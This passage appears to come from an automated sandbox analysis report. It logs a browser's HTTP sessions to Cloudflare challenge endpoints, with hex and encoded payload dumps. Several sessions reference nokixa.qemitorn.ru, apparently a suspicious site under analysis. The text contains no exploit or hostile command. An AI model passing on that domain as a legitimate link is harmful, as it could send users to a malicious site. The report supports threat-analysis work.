                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 0
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:35 UTC3170OUTData Raw: 76 5f 38 66 66 35 62 65 37 33 39 62 66 30 34 32 61 64 3d 79 62 77 75 41 75 71 75 6a 75 45 75 67 54 44 6d 54 44 50 75 54 65 78 43 7a 30 54 58 44 7a 4f 31 44 6c 50 44 73 57 34 73 6d 53 7a 44 78 65 7a 43 61 34 53 71 44 50 44 77 65 54 76 73 32 44 46 34 44 43 61 66 76 75 58 61 44 36 75 54 61 76 54 72 38 74 73 76 44 56 75 38 38 68 44 51 34 44 6a 51 44 58 65 73 58 44 7a 37 63 4c 25 32 62 57 39 43 54 6a 44 78 75 73 4f 32 44 54 62 73 48 76 34 54 6b 6b 51 42 31 4d 57 73 42 37 5a 36 45 70 67 76 76 71 33 61 5a 24 77 44 6f 57 35 63 51 79 4d 61 4a 75 54 63 63 79 43 4f 71 79 56 30 76 74 56 35 76 42 62 70 68 2b 57 68 78 6e 24 4a 55 57 67 71 4f 59 4d 4a 53 31 57 44 77 4a 55 62 42 7a 72 70 77 33 4d 54 6d 73 65 44 55 2d 70 68 53 66 77 42 72 44 54 24 31 33 43 44 24 69 44 46
                                                                                                        Data Ascii: v_8ff5be739bf042ad=ybwuAuqujuEugTDmTDPuTexCz0TXDzO1DlPDsW4smSzDxezCa4SqDPDweTvs2DF4DCafvuXaD6uTavTr8tsvDVu88hDQ4DjQDXesXDz7cL%2bW9CTjDxusO2DTbsHv4TkkQB1MWsB7Z6Epgvvq3aZ$wDoW5cQyMaJuTccyCOqyV0vtV5vBbph+Whxn$JUWgqOYMJS1WDwJUbBzrpw3MTmseDU-phSfwBrDT$13CD$iDF
                                                                                                        2025-01-09 16:18:36 UTC791INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:35 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 155720
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: 9hLBzRs6pZluLvbT5v8QMixO3yXQ7WjqSmQGcsMnALLKC+Y5zY2HqYJ/9RIBzmKHXArnCheuR9ACVrHzTlFUhtleYkn4OuaWl8k6vHMKMOfWCNlI7IAr06k0qAzQ8PE7GCMJfeLmdP1ceI+k1Gdwz/3PCOmHPJhB4uMhkp8n+rpsRjGhiraVrCxSlndj+O+DK2uECa90Iz833MFR3VaP9zdp9hYKo8efDR/31Dk/qaAag74x1lVWm/cGgatVJPoVaWHRTqJ/SUuAQGKiJzDjNZWD6TC0IjV6jP8ngsTOauDNPRxYM22FTLOKVT6B8M819Mwuehvwo5ckArHgGsglAAnA+85zBTnaZ9L2KBipTvVnvvPcRcxd0YCemeaOYzwmwFGumCtb4u9KFFhRjiWoUhX+xaMFfj9c2OkthEHGfyFxtjksAEVIGc+9w5VKBHzgf0Hw3lu1o4L2DuXSPDlpl6u+bgxcawQ/Pf+58evHImOBo5qYPc6Feeu/VsqLP+HnurlMV3lF1vLx3GIPYa8/SE8YefM=$Z0GDyH9OZ0W3Sdhf
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be7e3eae0f7b-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:36 UTC578INData Raw: 6b 71 65 63 67 73 6e 4c 77 4a 75 61 77 4b 48 55 79 73 71 2f 6a 64 65 75 72 62 43 55 6e 4e 2b 72 74 4c 7a 4c 7a 64 66 58 6e 73 48 45 78 39 6a 42 35 4b 72 4c 36 37 6d 6e 76 63 32 30 34 75 50 75 35 76 72 75 7a 39 58 48 73 4c 36 39 32 4f 48 79 7a 4c 66 46 2b 2b 50 47 36 4e 77 42 37 67 38 45 79 63 72 65 42 4e 4c 6c 35 2b 44 77 30 66 72 62 2b 51 2f 57 37 2f 6a 39 49 2b 45 50 42 2b 51 43 2f 66 48 31 36 77 4c 31 39 67 50 35 4d 77 73 41 41 54 54 73 4c 77 4d 50 46 53 63 61 39 6a 6f 63 48 44 55 6a 4d 7a 64 45 49 69 59 2b 50 7a 70 47 4e 69 77 2b 53 6a 6f 4d 4d 77 34 78 50 6a 46 4c 52 31 52 56 4b 44 55 30 58 53 30 78 53 31 6f 57 54 30 42 68 56 53 64 67 51 45 42 4b 4a 6b 68 4a 54 57 56 65 59 56 4d 75 62 6b 42 31 55 32 64 31 57 54 68 67 59 57 42 6a 62 32 4e 31 55 30 42
                                                                                                        Data Ascii: kqecgsnLwJuawKHUysq/jdeurbCUnN+rtLzLzdfXnsHEx9jB5KrL67mnvc204uPu5vruz9XHsL692OHyzLfF++PG6NwB7g8EycreBNLl5+Dw0frb+Q/W7/j9I+EPB+QC/fH16wL19gP5MwsAATTsLwMPFSca9jocHDUjMzdEIiY+PzpGNiw+SjoMMw4xPjFLR1RVKDU0XS0xS1oWT0BhVSdgQEBKJkhJTWVeYVMubkB1U2d1WThgYWBjb2N1U0B
                                                                                                        2025-01-09 16:18:36 UTC1369INData Raw: 63 30 50 57 31 4f 4d 6b 39 31 59 31 46 58 56 45 47 42 68 49 4e 68 65 6b 74 6d 68 6d 4a 36 68 47 53 49 5a 34 65 4b 64 33 61 56 64 6e 31 58 66 70 6c 38 6d 31 79 43 67 34 52 31 57 57 64 36 71 4b 4e 73 6c 34 39 6e 62 4b 79 4a 67 61 4f 6d 6c 71 68 30 75 71 6d 58 70 34 69 70 64 5a 36 66 69 6f 75 52 68 62 5a 2f 68 37 66 4c 75 4c 6d 65 68 63 61 76 76 72 72 46 73 35 33 45 75 4b 79 76 79 35 72 48 72 5a 6e 4b 31 4e 72 61 30 61 54 43 75 64 50 6a 31 39 2f 67 34 74 2f 46 36 74 69 6e 38 50 54 4e 38 2b 6e 52 30 38 76 46 7a 4f 54 38 41 4c 37 55 36 65 50 61 35 51 58 32 33 41 62 46 79 4e 73 4c 37 4f 44 34 35 67 6a 50 79 73 38 4d 36 50 50 57 46 75 6a 74 2f 64 66 55 39 42 4c 76 4a 41 38 69 2f 51 4c 76 43 69 48 63 46 75 77 49 43 41 67 52 36 42 73 30 4a 78 37 77 47 66 45 4f 38
                                                                                                        Data Ascii: c0PW1OMk91Y1FXVEGBhINhektmhmJ6hGSIZ4eKd3aVdn1Xfpl8m1yCg4R1WWd6qKNsl49nbKyJgaOmlqh0uqmXp4ipdZ6fiouRhbZ/h7fLuLmehcavvrrFs53EuKyvy5rHrZnK1Nra0aTCudPj19/g4t/F6tin8PTN8+nR08vFzOT8AL7U6ePa5QX23AbFyNsL7OD45gjPys8M6PPWFujt/dfU9BLvJA8i/QLvCiHcFuwICAgR6Bs0Jx7wGfEO8
                                                                                                        2025-01-09 16:18:36 UTC1369INData Raw: 56 67 55 38 38 56 33 51 2f 68 45 52 31 5a 34 74 65 6a 59 56 71 53 46 74 39 6b 47 64 76 65 57 46 59 6d 6c 78 36 6d 6d 36 66 56 35 75 64 56 6e 57 6c 6c 34 4f 6e 69 6e 64 33 70 32 53 62 67 49 36 4f 6b 59 32 65 67 70 47 75 74 4b 57 47 75 34 69 49 77 4a 4b 30 64 4c 36 65 6d 48 36 67 65 70 61 54 78 72 65 47 6f 4e 43 50 68 37 75 50 6b 62 33 42 79 4d 48 5a 31 35 75 77 75 62 44 62 73 4e 4f 77 6e 64 44 5a 30 39 61 6d 35 61 4b 6d 35 38 33 59 35 65 66 51 33 4b 79 6d 35 75 58 74 32 64 72 6a 75 74 44 53 33 76 50 39 2b 66 49 43 75 2f 50 43 41 39 6e 44 32 38 4d 4c 41 67 4d 4b 36 42 45 54 42 4f 66 78 7a 65 7a 6c 34 51 7a 6b 2b 2f 37 76 36 66 63 6a 45 77 48 35 4a 66 34 48 45 75 67 63 42 79 54 31 4d 42 6f 74 49 41 67 71 45 75 66 30 37 51 77 30 49 7a 58 79 4c 68 4d 79 4b 54
                                                                                                        Data Ascii: VgU88V3Q/hER1Z4tejYVqSFt9kGdveWFYmlx6mm6fV5udVnWll4Onind3p2SbgI6OkY2egpGutKWGu4iIwJK0dL6emH6gepaTxreGoNCPh7uPkb3ByMHZ15uwubDbsNOwndDZ09am5aKm583Y5efQ3Kym5uXt2drjutDS3vP9+fICu/PCA9nD28MLAgMK6BETBOfxzezl4Qzk+/7v6fcjEwH5Jf4HEugcByT1MBotIAgqEuf07Qw0IzXyLhMyKT
                                                                                                        2025-01-09 16:18:36 UTC1369INData Raw: 68 6d 5a 39 61 46 64 6a 58 59 70 38 59 49 35 4e 69 34 64 73 62 6e 69 51 6c 6e 70 30 6c 58 43 64 65 31 2b 66 58 56 32 54 64 33 39 39 61 5a 2b 49 61 36 79 58 62 36 74 73 6f 48 36 67 74 71 4b 58 72 4b 4b 48 75 35 43 66 66 4a 61 58 71 37 79 34 6c 4c 4b 45 67 5a 4f 6f 77 63 69 2b 72 59 79 43 72 34 72 42 73 59 66 41 31 4d 36 54 32 73 79 6c 6a 38 6e 55 6f 4d 79 77 32 63 33 50 6e 4d 53 69 33 65 54 6f 6f 72 37 6f 71 4c 6e 47 7a 63 43 72 38 50 61 7a 2b 50 48 30 31 72 54 70 75 62 62 39 76 50 4c 6a 35 4d 45 49 33 66 48 59 32 74 55 42 32 50 76 62 36 67 41 4e 79 64 33 32 44 66 51 4a 45 42 76 33 37 42 76 78 2b 78 6f 42 46 67 4d 52 4a 43 63 58 39 50 4c 36 47 79 54 32 4b 52 37 38 43 76 30 67 2f 43 55 73 41 69 54 32 4c 42 30 4b 43 44 77 30 4c 41 34 59 48 7a 34 57 2b 43 41
                                                                                                        Data Ascii: hmZ9aFdjXYp8YI5Ni4dsbniQlnp0lXCde1+fXV2Td399aZ+Ia6yXb6tsoH6gtqKXrKKHu5CffJaXq7y4lLKEgZOowci+rYyCr4rBsYfA1M6T2sylj8nUoMyw2c3PnMSi3eToor7oqLnGzcCr8Paz+PH01rTpubb9vPLj5MEI3fHY2tUB2Pvb6gANyd32DfQJEBv37Bvx+xoBFgMRJCcX9PL6GyT2KR78Cv0g/CUsAiT2LB0KCDw0LA4YHz4W+CA
                                                                                                        2025-01-09 16:18:36 UTC1369INData Raw: 6e 35 78 59 57 31 67 6a 47 57 48 63 32 5a 6a 61 32 39 54 6b 33 74 63 6e 4b 4f 41 6c 33 68 78 70 33 2b 6a 61 6e 6c 71 72 6d 70 33 6d 33 46 71 71 4c 57 4f 70 71 75 6d 72 70 6d 75 6e 5a 61 4d 6d 59 6d 2b 6b 70 71 41 76 4a 75 46 67 4a 7a 4b 6c 4c 36 2f 75 71 65 4b 30 4e 43 73 30 72 58 44 78 70 62 52 6b 70 62 57 6e 4d 6a 56 31 71 44 4e 74 71 33 57 74 4c 33 56 75 61 48 6c 35 61 32 6c 78 2b 62 64 30 62 4c 49 7a 39 61 7a 7a 76 58 77 75 63 37 49 2b 66 6a 34 41 76 54 73 39 50 41 44 41 4d 58 36 42 75 6a 69 44 4f 38 4e 2f 66 44 67 30 67 33 53 41 76 55 51 30 50 72 70 38 64 6b 48 46 42 7a 70 44 74 30 67 45 67 66 31 39 65 41 4b 47 52 73 58 4c 43 4c 77 4c 79 58 71 42 54 48 31 36 53 49 79 39 54 63 63 4e 50 73 73 45 53 78 41 41 41 42 46 2b 42 38 31 51 44 6f 2b 47 53 55 4c
                                                                                                        Data Ascii: n5xYW1gjGWHc2Zja29Tk3tcnKOAl3hxp3+janlqrmp3m3FqqLWOpqumrpmunZaMmYm+kpqAvJuFgJzKlL6/uqeK0NCs0rXDxpbRkpbWnMjV1qDNtq3WtL3VuaHl5a2lx+bd0bLIz9azzvXwuc7I+fj4AvTs9PADAMX6BujiDO8N/fDg0g3SAvUQ0Prp8dkHFBzpDt0gEgf19eAKGRsXLCLwLyXqBTH16SIy9TccNPssESxAAABF+B81QDo+GSUL
                                                                                                        2025-01-09 16:18:36 UTC1369INData Raw: 4f 49 55 47 56 7a 57 48 6d 65 58 6c 39 72 66 46 6d 59 64 70 6c 33 57 58 42 2f 5a 70 36 6b 6e 5a 31 74 69 6f 47 65 67 34 75 47 6a 70 61 33 75 48 69 48 6b 6e 75 57 74 72 31 2f 6f 38 42 2b 6e 73 43 51 78 37 61 43 6c 4a 33 44 79 49 79 6d 6d 63 36 70 71 4b 33 57 30 4e 6d 33 72 4d 2b 53 33 72 7a 53 79 74 57 79 6f 61 2b 74 73 39 76 70 73 38 44 6c 77 61 4f 6f 35 4d 44 77 78 64 37 30 30 38 2f 57 35 37 58 55 78 4f 76 54 38 50 66 68 32 4d 72 4e 42 63 58 57 2b 75 54 67 32 39 51 49 35 2f 59 45 78 38 6e 49 32 2b 6e 70 41 52 54 32 31 2f 4c 31 7a 68 6a 39 2f 75 67 4e 2f 41 45 43 47 65 50 37 4b 69 59 73 47 79 4d 6a 2f 4f 34 79 49 67 6b 77 4e 67 48 73 39 76 62 79 4e 6a 41 64 38 78 76 36 43 52 55 35 48 6a 6f 34 46 53 4d 6e 48 54 55 48 52 69 70 46 55 42 45 76 55 79 5a 44 52
                                                                                                        Data Ascii: OIUGVzWHmeXl9rfFmYdpl3WXB/Zp6knZ1tioGeg4uGjpa3uHiHknuWtr1/o8B+nsCQx7aClJ3DyIymmc6pqK3W0Nm3rM+S3rzSytWyoa+ts9vps8DlwaOo5MDwxd7008/W57XUxOvT8Pfh2MrNBcXW+uTg29QI5/YEx8nI2+npART21/L1zhj9/ugN/AECGeP7KiYsGyMj/O4yIgkwNgHs9vbyNjAd8xv6CRU5Hjo4FSMnHTUHRipFUBEvUyZDR
                                                                                                        2025-01-09 16:18:36 UTC1369INData Raw: 74 6b 56 78 59 62 58 46 62 6e 6d 43 69 57 59 65 54 67 57 6d 5a 66 34 57 58 73 48 71 7a 66 4c 47 6a 69 35 39 78 6f 61 75 45 68 36 61 31 69 71 47 64 72 58 79 37 78 72 47 42 6b 49 4f 4b 76 4c 61 34 75 5a 2f 48 79 63 69 2b 79 70 36 69 31 49 2b 70 6c 73 79 56 73 74 6d 34 6d 2b 43 79 32 4b 7a 54 30 4c 58 46 35 37 7a 72 79 65 61 2b 74 2b 76 75 79 4e 47 7a 77 75 44 46 31 66 66 61 32 74 58 37 7a 73 66 37 2f 74 48 4f 37 74 44 56 30 64 6a 46 33 2f 76 4d 43 39 66 75 32 51 58 38 33 63 38 42 36 77 6e 73 42 50 44 32 42 39 59 4a 37 68 44 64 44 65 30 67 44 68 48 32 38 53 67 56 39 66 77 70 2f 66 6a 6e 49 67 67 70 2f 43 41 4e 41 79 73 72 42 66 54 37 2b 53 67 2b 48 67 41 76 2f 45 41 75 47 43 63 69 53 44 63 61 46 67 55 35 47 68 6f 4f 4f 31 56 4f 53 6b 38 73 45 54 6c 46 4f 41
                                                                                                        Data Ascii: tkVxYbXFbnmCiWYeTgWmZf4WXsHqzfLGji59xoauEh6a1iqGdrXy7xrGBkIOKvLa4uZ/Hyci+yp6i1I+plsyVstm4m+Cy2KzT0LXF57zryea+t+vuyNGzwuDF1ffa2tX7zsf7/tHO7tDV0djF3/vMC9fu2QX83c8B6wnsBPD2B9YJ7hDdDe0gDhH28SgV9fwp/fjnIggp/CANAysrBfT7+Sg+HgAv/EAuGCciSDcaFgU5GhoOO1VOSk8sETlFOA
                                                                                                        2025-01-09 16:18:36 UTC1369INData Raw: 6b 70 69 65 58 56 35 69 59 61 57 74 70 48 74 33 72 49 57 65 66 48 43 44 62 36 52 7a 65 4c 71 79 75 58 75 65 69 4a 79 5a 72 4a 6e 41 66 35 65 39 70 63 54 4a 69 62 79 2b 69 71 57 2f 75 36 33 4c 6f 6f 75 6d 6f 36 65 76 79 62 66 52 79 71 75 59 32 4a 69 37 6e 4c 2f 61 76 64 4c 64 78 39 57 6a 74 62 36 36 72 36 6a 79 37 73 62 79 39 73 50 43 7a 72 62 6d 37 37 7a 30 7a 64 50 32 2b 72 54 32 76 4e 58 6e 35 50 72 30 41 2f 66 32 42 64 66 33 79 41 50 76 30 41 30 4d 44 41 45 4d 36 63 77 52 2b 39 54 37 39 42 77 43 47 78 51 42 2f 52 67 63 32 68 59 42 42 43 73 74 43 77 76 2b 36 65 77 4c 4c 43 59 71 4e 79 30 69 45 68 41 4e 42 7a 73 53 4c 43 34 4f 41 68 73 31 44 78 5a 45 42 55 55 48 4f 78 70 42 43 46 42 50 4b 43 34 2b 4c 78 46 58 4b 55 4a 4a 4a 43 6f 65 46 53 78 69 4f 69 38
                                                                                                        Data Ascii: kpieXV5iYaWtpHt3rIWefHCDb6RzeLqyuXueiJyZrJnAf5e9pcTJiby+iqW/u63Looumo6evybfRyquY2Ji7nL/avdLdx9Wjtb66r6jy7sby9sPCzrbm77z0zdP2+rT2vNXn5Pr0A/f2Bdf3yAPv0A0MDAEM6cwR+9T79BwCGxQB/Rgc2hYBBCstCwv+6ewLLCYqNy0iEhANBzsSLC4OAhs1DxZEBUUHOxpBCFBPKC4+LxFXKUJJJCoeFSxiOi8
                                                                                                        2025-01-09 16:18:36 UTC1369INData Raw: 6f 61 4d 68 70 36 4c 6e 59 75 6e 70 57 36 41 6c 33 4a 31 64 70 57 4b 69 6f 2b 77 66 5a 6d 52 77 4b 53 62 73 35 33 43 78 4b 57 32 77 34 76 44 68 4d 2b 59 6e 62 4f 70 6e 70 47 56 73 59 36 71 31 63 32 36 72 36 32 66 79 65 48 44 72 39 54 6b 33 71 53 67 73 62 6a 45 6e 73 44 59 35 4d 54 53 32 75 33 4e 7a 74 50 77 35 2f 53 33 39 4c 62 74 33 66 79 39 30 77 4c 55 39 2b 44 58 7a 39 2f 67 31 75 66 6d 2b 51 2f 4c 37 42 45 54 36 42 50 39 36 39 55 61 39 74 67 4b 37 76 44 71 2f 66 4c 67 41 66 33 69 2f 66 4d 49 2b 68 30 62 4a 78 58 6d 41 79 51 76 4d 53 59 42 37 53 38 55 38 79 30 6b 46 43 77 52 2f 66 73 5a 43 66 67 58 4d 76 6f 34 42 54 51 70 4d 6a 30 4b 51 69 41 77 4a 78 34 4c 52 79 41 50 4b 42 46 43 4c 41 77 36 57 46 56 51 57 7a 68 69 56 54 4e 6b 47 31 70 63 49 6c 6f 2b
                                                                                                        Data Ascii: oaMhp6LnYunpW6Al3J1dpWKio+wfZmRwKSbs53CxKW2w4vDhM+YnbOpnpGVsY6q1c26r62fyeHDr9Tk3qSgsbjEnsDY5MTS2u3NztPw5/S39Lbt3fy90wLU9+DXz9/g1ufm+Q/L7BET6BP969Ua9tgK7vDq/fLgAf3i/fMI+h0bJxXmAyQvMSYB7S8U8y0kFCwR/fsZCfgXMvo4BTQpMj0KQiAwJx4LRyAPKBFCLAw6WFVQWzhiVTNkG1pcIlo+


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.174975735.190.80.14431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:35 UTC545OUTOPTIONS /report/v4?s=s%2Fl3Y%2Fbp5Cw%2BuuxMrGPbPKsbDSCs%2BGRxG0MfdceJDPz%2BKZscdduUOMQQgynlO9sp%2FOxrD9JZb64R9rWW8tEbyAL0zeFBbG3cJ4BESe6gkARgqStl17cDN%2FfQkcU1Dw%3D%3D HTTP/1.1
                                                                                                        Host: a.nel.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Origin: https://nokixa.qemitorn.ru
                                                                                                        Access-Control-Request-Method: POST
                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:35 UTC336INHTTP/1.1 200 OK
                                                                                                        Content-Length: 0
                                                                                                        access-control-max-age: 86400
                                                                                                        access-control-allow-methods: OPTIONS, POST
                                                                                                        access-control-allow-origin: *
                                                                                                        access-control-allow-headers: content-length, content-type
                                                                                                        date: Thu, 09 Jan 2025 16:18:35 GMT
                                                                                                        Via: 1.1 google
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.174975935.190.80.14431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:36 UTC484OUTPOST /report/v4?s=s%2Fl3Y%2Fbp5Cw%2BuuxMrGPbPKsbDSCs%2BGRxG0MfdceJDPz%2BKZscdduUOMQQgynlO9sp%2FOxrD9JZb64R9rWW8tEbyAL0zeFBbG3cJ4BESe6gkARgqStl17cDN%2FfQkcU1Dw%3D%3D HTTP/1.1
                                                                                                        Host: a.nel.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 431
                                                                                                        Content-Type: application/reports+json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:36 UTC431OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 6f 6b 69 78 61 2e 71 65 6d 69 74 6f 72 6e 2e 72 75 2f 79 7a 38 45 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 35 38 2e 31 37 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":118,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://nokixa.qemitorn.ru/yz8E/","sampling_fraction":1.0,"server_ip":"104.21.58.174","status_code":404,"type":"http.error"},"type":"network-error"
                                                                                                        2025-01-09 16:18:36 UTC168INHTTP/1.1 200 OK
                                                                                                        Content-Length: 0
                                                                                                        date: Thu, 09 Jan 2025 16:18:36 GMT
                                                                                                        Via: 1.1 google
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.1749760104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:36 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:36 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 09 Jan 2025 16:18:36 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: pd9gwZwXQGeCLJLhPAQ2U6IddpuU7GY2/RY=$xv/ESnXm3mkqG0Tw
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be844e614397-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:36 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.1749761104.18.94.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:37 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ff5be739bf042ad/1736439515896/e1dd5f50336968dc9321d58ea4a711682e2132ee2edae4130f32588e70809f9c/L7iIotAeMgj8B4L HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: max-age=0
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:37 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                        Date: Thu, 09 Jan 2025 16:18:37 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Content-Length: 1
                                                                                                        Connection: close
                                                                                                        2025-01-09 16:18:37 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 34 64 31 66 55 44 4e 70 61 4e 79 54 49 64 57 4f 70 4b 63 52 61 43 34 68 4d 75 34 75 32 75 51 54 44 7a 4a 59 6a 6e 43 41 6e 35 77 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g4d1fUDNpaNyTIdWOpKcRaC4hMu4u2uQTDzJYjnCAn5wAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                        2025-01-09 16:18:37 UTC1INData Raw: 4a
                                                                                                        Data Ascii: J


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
